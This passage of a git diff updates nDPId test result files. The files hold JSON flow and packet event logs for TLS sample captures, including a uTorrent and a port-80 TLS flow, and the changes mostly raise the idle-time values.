O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":182,"packets-processed":182,"total-skipped-flows":0,"total-l4-data-len":105569,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1553619149372} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 182/182 diff --git a/test/results/tls_port_80.pcapng.out b/test/results/tls_port_80.pcapng.out index 28b508b44..876651e5c 100644 --- a/test/results/tls_port_80.pcapng.out +++ b/test/results/tls_port_80.pcapng.out @@ -1,12 +1,12 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_port_80.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1618744619257} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744619257,"flow_last_seen":1618744619257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744619257,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} -01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744619257,"flow_last_seen":1618744619257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744619257,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} +01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":1605,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1618744633908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 diff --git a/test/results/tls_torrent.pcapng.out b/test/results/tls_torrent.pcapng.out index c28c1e954..a4e4ad973 100644 --- a/test/results/tls_torrent.pcapng.out +++ b/test/results/tls_torrent.pcapng.out @@ -1,13 +1,13 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_torrent.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054407415} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054407415,"flow_last_seen":1639054407415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054407415,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} -00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054407415,"flow_last_seen":1639054407415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054407415,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} +00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 